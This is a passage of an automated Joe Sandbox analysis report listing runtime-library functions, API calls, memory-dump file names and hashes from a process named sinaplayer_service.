                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6C5ADA50
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,?,00000001), ref: 6C5ADA65
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5ADA6C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5ADA73
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocErrorExceptionHeapLastThrow_callnewh_errnomallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2319598913-2104205924
                                                                                                                                                                                                    • Opcode ID: 8dc9e8631f2ce088bf61a8cffdfe102de438adea70b293b768c67963d76c8265
                                                                                                                                                                                                    • Instruction ID: 3ff0a2580c07759dbd186f48676840791b804fb01b41c739fdf1b7ee1d876b19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dc9e8631f2ce088bf61a8cffdfe102de438adea70b293b768c67963d76c8265
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F0F675500209E7CB10BFA6DC01ADE7768AF41218F10081AE80497E50EF749E5486D4
                                                                                                                                                                                                    Function 6C5769D9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38threadCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000180,6C5648CA), ref: 6C5769E4
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000002,00000180,6C5648CA), ref: 6C5769F5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000001,00000002,00000180,6C5648CA), ref: 6C5A345B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5648CA,6C62D088,00000001,00000002,00000180), ref: 6C5A3470
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5A3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6C5A347D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • 4z[lLz[l`z[lSchedulerKind, xrefs: 6C5A3445
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerThreadValue@$CurrentExceptionPriorityThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: 4z[lLz[l`z[lSchedulerKind
                                                                                                                                                                                                    • API String ID: 4031781369-2280248837
                                                                                                                                                                                                    • Opcode ID: 2089f4ed8c228c067fce8177f6ae6d63e77ddc1b6012ad24368a17313d2bf7bb
                                                                                                                                                                                                    • Instruction ID: 2e173e57aa73c4225859f890c71568386e6c9cd59bd2f3296f8118f42808d96e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2089f4ed8c228c067fce8177f6ae6d63e77ddc1b6012ad24368a17313d2bf7bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0F671A01219EBDF10DFB58D49AEE7BBCBB11244F000955ED15A3A40EB74D905CBB8
                                                                                                                                                                                                    Function 0038DF90 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXPA_W00@Z.MSVCP120(8285FFAB,8285FFAB,?), ref: 0038E00F
                                                                                                                                                                                                    • fgetwc.MSVCR120 ref: 0038E01E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038E138
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 0038E18A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@?setg@?$basic_streambuf@_U?$char_traits@_W00@W@std@@@std@@fgetwcungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 26466257-0
                                                                                                                                                                                                    • Opcode ID: b5539aadfe12b0ea11544e0a1ad65e03422d28a259daf43273e6db019f1b1e9d
                                                                                                                                                                                                    • Instruction ID: 3c142944f5ad729f4071734170b8146ae50e1564513c822de2e5ec0383034011
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5539aadfe12b0ea11544e0a1ad65e03422d28a259daf43273e6db019f1b1e9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36619071A0021ADFDF26DFA8C845AEEB7B8FF08314F540566E902B7680D731E954CBA1
                                                                                                                                                                                                    Function 6C5C4DA7 Relevance: 12.2, APIs: 8, Instructions: 158COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120 ref: 6C5C4DEA
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4E52
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4E69
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4E7C
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4EC8
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4EDF
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6C5C4EF2
                                                                                                                                                                                                    • List.LIBCMT ref: 6C5C4F3B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::FindGroupRing::ScheduleSchedulingSegment$List$AcquireConcurrency@@Lock@details@ReaderWrite@_Writer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 230955726-0
                                                                                                                                                                                                    • Opcode ID: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction ID: 0d1cd9693a8d2c7c02eeb79097ce74a734f5f509dbe2261c1df4cdfe93521f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4515D75B04209EFDB08CB95CC94FEAB7B8FF45318F05856DE51AA7A40C734AA04CB92
                                                                                                                                                                                                    Function 00386F20 Relevance: 12.1, APIs: 8, Instructions: 138threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Reset@CallbackBase@internal@base@@QAEXXZ.BASE(8285FFAB), ref: 00386F64
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0039AF90,000000FF), ref: 00386F7D
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?,8285FFAB), ref: 00387002
                                                                                                                                                                                                    • ?Reset@CallbackBase@internal@base@@QAEXXZ.BASE ref: 00387011
                                                                                                                                                                                                    • ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE ref: 00387024
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0039AF90,000000FF), ref: 00387041
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE ref: 00387076
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0038709B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Base@subtle@base@@CallbackCountedSafeThread$Release@$Reset@$Ref@V012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1412264623-0
                                                                                                                                                                                                    • Opcode ID: 58332cdfcea1b27e5f1f510533f452556dde40085c75805f5a32810544487adf
                                                                                                                                                                                                    • Instruction ID: fef5b6fe62f8b0c71d3e60daf20c48d2a95b4d2088e02ae36cd963c2399b3c2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58332cdfcea1b27e5f1f510533f452556dde40085c75805f5a32810544487adf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9851ECB1A04705DFDB12EF54D905BAEB7A8FF04710F55029AEC16AB780DB71EA10CB90
                                                                                                                                                                                                    Function 00391730 Relevance: 12.1, APIs: 8, Instructions: 104COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00390CF2
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,8285FFAB), ref: 00390D10
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00390D3A
                                                                                                                                                                                                      • Part of subcall function 00390CB0: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 00390D54
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917A5
                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917B1
                                                                                                                                                                                                    • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000002), ref: 003917CD
                                                                                                                                                                                                    • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP120(?), ref: 003917E0
                                                                                                                                                                                                    • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000000,?), ref: 00391818
                                                                                                                                                                                                    • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP120(00000000,?,?), ref: 00391828
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000), ref: 00391852
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00391863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?seekg@?$basic_istream@?setstate@?$basic_ios@_V12@_$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??1?$basic_ios@_?clear@?$basic_ios@?read@?$basic_istream@?tellg@?$basic_istream@D@std@@@1@_H@2@Init@?$basic_streambuf@_V12@V?$basic_streambuf@V?$fpos@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3756623340-0
                                                                                                                                                                                                    • Opcode ID: 83293fce6b494b70d43a974797582b980c15e13099c1712a279aa6f431357055
                                                                                                                                                                                                    • Instruction ID: 23e5f78046de20f293882bc1c486f579432ec7319e1055204fb6c55bf8a2b200
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83293fce6b494b70d43a974797582b980c15e13099c1712a279aa6f431357055
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441C231640205AFDF26DB54CE9AFDAB7B8FB14700F0141A5E60AAB2E0DB31AE04CF50
                                                                                                                                                                                                    Function 6C564C47 Relevance: 12.1, APIs: 8, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6C564C90
                                                                                                                                                                                                    • _read.MSVCR120(00000000,?,?), ref: 6C564C97
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CBA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CCA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6C564CDB
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?), ref: 6C564CE6
                                                                                                                                                                                                      • Part of subcall function 6C5658BC: _malloc_crt.MSVCR120(00001000,0]Zl,?,6C5813DD,0]Zl,00000000,00000000,00000000,?,6C5A5D30,00000000,?), ref: 6C5658C6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A4FFE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A5009
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_invalid_parameter_noinfo_malloc_crt_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1828220225-0
                                                                                                                                                                                                    • Opcode ID: 1ba9a146fafe0e01d801a800db7c2c153c677be46f3be4f832c9ec57e8c33b3b
                                                                                                                                                                                                    • Instruction ID: 954996937a547e3c755cfea19a99d953d3141b202568ac2f9182f83a2bfdbc96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba9a146fafe0e01d801a800db7c2c153c677be46f3be4f832c9ec57e8c33b3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231F531444606AAD710CA7BCC5076AB7B0BF4273CF248709D47486EF1D738E4568BD1
                                                                                                                                                                                                    Function 6C582ECC Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6C582F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6C582F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6C582F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6C582F4A
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: _get_osfhandle.MSVCR120(?,?,?,?,6C564F10,?,6C564F30,00000010), ref: 6C564DFA
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: _get_osfhandle.MSVCR120(?), ref: 6C564E1D
                                                                                                                                                                                                      • Part of subcall function 6C564DF1: CloseHandle.KERNEL32(00000000), ref: 6C564E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6C5AF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6C5AF080
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: 9424b3a5bad874a063449f07bdb6f6a421dd40d73fb8d381f8dbbad5c4ed30b6
                                                                                                                                                                                                    • Instruction ID: 4eb2e9b558ffd6fce798dbd6404fdd5ce23cc3996dfef361782172a18aa4a497
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9424b3a5bad874a063449f07bdb6f6a421dd40d73fb8d381f8dbbad5c4ed30b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331F831A05260BFCB209F7ADCD4A9A7FF4EF06318F254699E4588FAA2C770D801CB55
                                                                                                                                                                                                    Function 6C570C5E Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6C570D40,0000000C), ref: 6C570C95
                                                                                                                                                                                                      • Part of subcall function 6C564B96: _lock.MSVCR120(?), ref: 6C564BC1
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6C570D40,0000000C), ref: 6C570CA5
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6C570D16
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C570D22
                                                                                                                                                                                                    • _errno.MSVCR120(6C570D40,0000000C), ref: 6C5A5539
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C570D40,0000000C), ref: 6C5A5544
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6C570D40,0000000C), ref: 6C5A5551
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6C570D40,0000000C), ref: 6C5A555C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__ftbuf__output_l_fileno_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3923144078-0
                                                                                                                                                                                                    • Opcode ID: b587616c3fdde18e1d9a64b153342a7c6ffadd84a54d8ce7377ea34359b516b2
                                                                                                                                                                                                    • Instruction ID: 1d56d4064d32acd94606253d4ae3bb0ac863f7e22888eabf9692e75c8c2378d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b587616c3fdde18e1d9a64b153342a7c6ffadd84a54d8ce7377ea34359b516b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35212B71500645DBD7109FBA8C80A6F75E5AFD133CB64832AE4348AEE0DB39C9458B21
                                                                                                                                                                                                    Function 00372310 Relevance: 12.1, APIs: 8, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120(8285FFAB,?,00000000,?,00000000,00398E48,000000FF,?,0037198F,?), ref: 00372346
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372359
                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP120(?,0037198F,?), ref: 00372374
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372385
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 00372396
                                                                                                                                                                                                    • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP120(?,0037198F,?), ref: 003723A7
                                                                                                                                                                                                    • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP120(?,0037198F,?), ref: 003723AF
                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP120(?,0037198F,?), ref: 003723BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
